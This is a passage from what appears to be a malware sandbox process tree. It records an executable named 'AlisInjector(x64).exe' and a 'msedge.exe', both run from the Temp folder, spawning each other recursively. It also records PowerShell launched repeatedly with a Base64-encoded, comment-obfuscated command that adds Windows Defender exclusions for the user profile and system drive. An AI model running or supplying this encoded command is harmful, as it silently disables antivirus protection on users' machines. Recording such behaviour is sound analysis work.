                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe"
                                                                                                                                                            24⤵
                                                                                                                                                              PID:5832
                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAagBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgBnACMAPgA="
                                                                                                                                                                25⤵
                                                                                                                                                                  PID:5480
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\msedge.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
                                                                                                                                                                  25⤵
                                                                                                                                                                    PID:5468
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe"
                                                                                                                                                                    25⤵
                                                                                                                                                                      PID:6016
                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAagBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgBnACMAPgA="
                                                                                                                                                                        26⤵
                                                                                                                                                                          PID:5956
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\msedge.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
                                                                                                                                                                          26⤵
                                                                                                                                                                            PID:5632
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe"
                                                                                                                                                                            26⤵
                                                                                                                                                                              PID:5656
                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAagBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgBnACMAPgA="
                                                                                                                                                                                27⤵
                                                                                                                                                                                  PID:6396
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\msedge.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
                                                                                                                                                                                  27⤵
                                                                                                                                                                                    PID:6428
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe"
                                                                                                                                                                                    27⤵
                                                                                                                                                                                      PID:6436
                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAagBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgBnACMAPgA="
                                                                                                                                                                                        28⤵
                                                                                                                                                                                          PID:6656
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\msedge.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
                                                                                                                                                                                          28⤵
                                                                                                                                                                                            PID:6664
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe"
                                                                                                                                                                                            28⤵
                                                                                                                                                                                              PID:6676
                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAagBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgBnACMAPgA="
                                                                                                                                                                                                29⤵
                                                                                                                                                                                                  PID:6924
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\msedge.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
                                                                                                                                                                                                  29⤵
                                                                                                                                                                                                    PID:6932
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe"
                                                                                                                                                                                                    29⤵
                                                                                                                                                                                                      PID:6944
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAagBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgBnACMAPgA="
                                                                                                                                                                                                        30⤵
                                                                                                                                                                                                          PID:7152
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\msedge.exe
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
                                                                                                                                                                                                          30⤵
                                                                                                                                                                                                            PID:5676
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe"
                                                                                                                                                                                                            30⤵
                                                                                                                                                                                                              PID:4380
                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAagBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgBnACMAPgA="
                                                                                                                                                                                                                31⤵
                                                                                                                                                                                                                  PID:6416
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\msedge.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
                                                                                                                                                                                                                  31⤵
                                                                                                                                                                                                                    PID:6232
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe"
                                                                                                                                                                                                                    31⤵
                                                                                                                                                                                                                      PID:6568
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAagBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgBnACMAPgA="
                                                                                                                                                                                                                        32⤵
                                                                                                                                                                                                                          PID:6888
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\msedge.exe
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
                                                                                                                                                                                                                          32⤵
                                                                                                                                                                                                                            PID:6896
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe"
                                                                                                                                                                                                                            32⤵
                                                                                                                                                                                                                              PID:6904
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAagBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgBnACMAPgA="
                                                                                                                                                                                                                                33⤵
                                                                                                                                                                                                                                  PID:6160
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\msedge.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
                                                                                                                                                                                                                                  33⤵
                                                                                                                                                                                                                                    PID:936
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe
                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe"
                                                                                                                                                                                                                                    33⤵
                                                                                                                                                                                                                                      PID:6304
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAagBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgBnACMAPgA="
                                                                                                                                                                                                                                        34⤵
                                                                                                                                                                                                                                          PID:6776
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\msedge.exe
                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
                                                                                                                                                                                                                                          34⤵
                                                                                                                                                                                                                                            PID:5308
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe
                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe"
                                                                                                                                                                                                                                            34⤵
                                                                                                                                                                                                                                              PID:6832
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAagBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgBnACMAPgA="
                                                                                                                                                                                                                                                35⤵
                                                                                                                                                                                                                                                  PID:6508
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\msedge.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
                                                                                                                                                                                                                                                  35⤵
                                                                                                                                                                                                                                                    PID:1824
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe"
                                                                                                                                                                                                                                                    35⤵
                                                                                                                                                                                                                                                      PID:5472
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAagBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgBnACMAPgA="
                                                                                                                                                                                                                                                        36⤵
                                                                                                                                                                                                                                                          PID:5448
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\msedge.exe
                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
                                                                                                                                                                                                                                                          36⤵
                                                                                                                                                                                                                                                            PID:6112
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe"
                                                                                                                                                                                                                                                            36⤵
                                                                                                                                                                                                                                                              PID:7208
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAagBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgBnACMAPgA="
                                                                                                                                                                                                                                                                37⤵
                                                                                                                                                                                                                                                                  PID:7432
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\msedge.exe
                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
                                                                                                                                                                                                                                                                  37⤵
                                                                                                                                                                                                                                                                    PID:7444
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe
                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe"
                                                                                                                                                                                                                                                                    37⤵
                                                                                                                                                                                                                                                                      PID:7452
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAagBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgBnACMAPgA="
                                                                                                                                                                                                                                                                        38⤵
                                                                                                                                                                                                                                                                          PID:7636
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\msedge.exe
                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
                                                                                                                                                                                                                                                                          38⤵
                                                                                                                                                                                                                                                                            PID:7660
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe
                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe"
                                                                                                                                                                                                                                                                            38⤵
                                                                                                                                                                                                                                                                              PID:7672
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAagBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgBnACMAPgA="
                                                                                                                                                                                                                                                                                39⤵
                                                                                                                                                                                                                                                                                  PID:7852
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\msedge.exe
                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
                                                                                                                                                                                                                                                                                  39⤵
                                                                                                                                                                                                                                                                                    PID:7860
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe
                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe"
                                                                                                                                                                                                                                                                                    39⤵
                                                                                                                                                                                                                                                                                      PID:7868
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAagBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgBnACMAPgA="
                                                                                                                                                                                                                                                                                        40⤵
                                                                                                                                                                                                                                                                                          PID:8096
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\msedge.exe
                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
                                                                                                                                                                                                                                                                                          40⤵
                                                                                                                                                                                                                                                                                            PID:8176
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe
                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe"
                                                                                                                                                                                                                                                                                            40⤵
                                                                                                                                                                                                                                                                                              PID:6732
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAagBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgBnACMAPgA="
                                                                                                                                                                                                                                                                                                41⤵
                                                                                                                                                                                                                                                                                                  PID:3196
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\msedge.exe
                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
                                                                                                                                                                                                                                                                                                  41⤵
                                                                                                                                                                                                                                                                                                    PID:7592
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe
                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe"
                                                                                                                                                                                                                                                                                                    41⤵
                                                                                                                                                                                                                                                                                                      PID:7056
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAagBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgBnACMAPgA="
                                                                                                                                                                                                                                                                                                        42⤵
                                                                                                                                                                                                                                                                                                          PID:7412
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\msedge.exe
                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
                                                                                                                                                                                                                                                                                                          42⤵
                                                                                                                                                                                                                                                                                                            PID:7912
                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe
                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe"
                                                                                                                                                                                                                                                                                                            42⤵
                                                                                                                                                                                                                                                                                                              PID:8188
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAagBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgBnACMAPgA="
                                                                                                                                                                                                                                                                                                                43⤵
                                                                                                                                                                                                                                                                                                                  PID:3720
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\msedge.exe
                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
                                                                                                                                                                                                                                                                                                                  43⤵
                                                                                                                                                                                                                                                                                                                    PID:3320
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe
                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe"
                                                                                                                                                                                                                                                                                                                    43⤵
                                                                                                                                                                                                                                                                                                                      PID:2684
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAagBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgBnACMAPgA="
                                                                                                                                                                                                                                                                                                                        44⤵
                                                                                                                                                                                                                                                                                                                          PID:7348
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\msedge.exe
                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
                                                                                                                                                                                                                                                                                                                          44⤵
                                                                                                                                                                                                                                                                                                                            PID:7584
                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe
                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe"
                                                                                                                                                                                                                                                                                                                            44⤵
                                                                                                                                                                                                                                                                                                                              PID:7352
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAagBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgBnACMAPgA="
                                                                                                                                                                                                                                                                                                                                45⤵
                                                                                                                                                                                                                                                                                                                                  PID:7144
                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\msedge.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
                                                                                                                                                                                                                                                                                                                                  45⤵
                                                                                                                                                                                                                                                                                                                                    PID:7508
                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe
                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe"
                                                                                                                                                                                                                                                                                                                                    45⤵
                                                                                                                                                                                                                                                                                                                                      PID:7480
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
